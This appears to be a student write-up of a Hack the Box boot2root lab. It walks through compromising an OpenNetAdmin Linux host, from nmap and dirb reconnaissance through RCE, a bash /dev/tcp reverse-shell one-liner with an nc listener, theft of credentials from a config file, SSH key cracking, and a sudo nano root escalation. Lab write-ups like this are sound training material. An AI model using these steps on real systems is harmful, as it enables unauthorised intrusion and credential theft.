Introduction:

In this assessment task, we are going to conduct a boot2root challenge on Hack the Box system. This system is a Linux based system. It is basically a network based attack where we going to use several networking tools like Nmap, Netcat, Dirb and some python scripts. These tools are used to find the vulnerability in the system and the ways to log-into the system and the contents of the system is being viewed by these tools. 

The vulnerability and exploit:

A vulnerability is known as a weaker point of a system or software code that can be left while writing a code. It is usually found in a complex environment or any secured system or servers. Some vulnerability is being generated by using default settings with software, on social media platforms and with email accounts, etc. An attacker uses these vulnerabilities to attack on the system that can be known by so many means like using sniffing tools. While exploits are open door found at the system that are used to access the victim’s system. We can say that without a vulnerability there is no exploit. In this assessment, we use a vulnerable system where some ports are opened that used to run some services. We use these vulnerabilities to exploit the system.

First, we try Nmap and dirb tools to collect the information of the target system. This process is generally called Recon. In this activity, we use some tools and techniques to find the key information of the target system. We start this process with Nmap and try to find the version and open ports on the system. For this purpose, we use the below command (assuming the target system IP is 192.168.30.4) – 

$ nmap -sV -Pn 192.168.30.4

Here, we able to find some open ports, system version and running services on the target system that we can use to get enter into the system. Now, we do fuzz this system and try to find accessible directories on that system, using dirb tool.

We get some directories, as a result of dirb, on this system like test2 and artwork.

While checking the directories, we find a login page of open net admin or ona, in the test2 folder. We find an app version, at the login page while researching on it.

Now, we download a python code to do the exploit. First, we check that this working URL is vulnerable or not, using this code. 

Attack narrative:

In the above part, we find that the found URL is vulnerable to RCE. After some tries, we successfully executed the commands to exploit the system vulnerability.

From the above results, we successfully connected to the target system and find a user named “user1” with uid – 43, groups - 43 and gid – 43.

Now, we use netcat tool to find out further vulnerability in this system. We try to access the reverse shell from this Linux system using this command – 

$ /bin/bash -c ‘bash -I >& /dev/tcp/<IP>/<PORT> 0> 

The result is as follow – 

To establish a connection to the remote host (target system), we use this command (Kili, 2020) – 

$ nc -lvp 1234

The connection is established successfully with this attempt and have access to the /opt/ona/www directory of the user user1.

Now, we started collecting the directory information and the data saved on this system using basic Linux commands like ls and found the below result. This provide us a list of files and directories saved on this system, shown in the below result.

We look into several directories to find some fruitful data or information. 

In the above result of directory listing, the config directory has a php script which found interesting. So, we look into this script and found that this script is a database script running on local host (system) and have configured with secured credentials that are now revealed. Here is the directory listing and the found php script view – 

The php script has some secret credentials that can be used for login purpose. 

To further query on the found credentials, we search or the users in the home directory of this system and found two user accounts.

So, we try to connect with these users via SSH to their user account using the password, we found in the script in the previous steps. The login attempt was successful, now we are able to list the files and directories of the user.

Here we found the main.php file in the directory - /internal. As listed in this php code, we can able to find out the rsa key (private key for SSH) of user User3.

We found a shell script, named LinEnum.sh, to find out which ports on the remote system are open and in listening state (rebootuser/LinEnum, 2020). The script is download and executed to check the port status and found two open ports on this system.

Using the curl command, we can check on which local port the main.php is executed.

The result of this command is as follow – 

We are successfully retrieved the SSH key from the port 52846. This key is saved in a text file and we try to crack this private SSH key to find out the password. To do this, we first switch to root account and try to crack this key using John the Ripper tool (Chandel, 2020). Here are the steps – 

From the above steps, we are successfully getting the password from the ssh key for user2. Now we switched back to the user User2 to check the password is working or not, using ssh to the user account.

The attempt is successful and we logged into the user account.

Implication of attack:

To conduct a successful cyber-attack, we need to have complete access of the target system so that we can do major damage to it. This term is called implication which can affect a business or system to the most. For this purpose, we take root or admin level access of the system by modifying system entries via system files. 

We find the directories where we didn’t need root privilege to access any file or directory in this system. For this, we execute the below command – 

$ sudo -l

Here, we have the directory - /bin/nano, where we did not need to enter root password. We can switch our privilege from user to root from /opt/priv file, using the below script – 

$ reset; sh 1>&0 2>&0

We can now check our access privilege by running ‘whoami’ and found that we are now have access of root account and have full control of the system.

Conclusion

In this assessment task, the boot2root challenge, we have a target system on which we will do some hacking attacks and try to find out the vulnerabilities on that system. For this purpose, we use several command lines tools like nmap, dirb, netcat, shell and python scripts to find the vulnerabilities in the system. First, we search for the open ports and running services ono the target system. Based on the result, we further try to access the system using those services and open ports. At the end of the task, we have complete access of the system with root privilege and we can access all the system’s files and directories.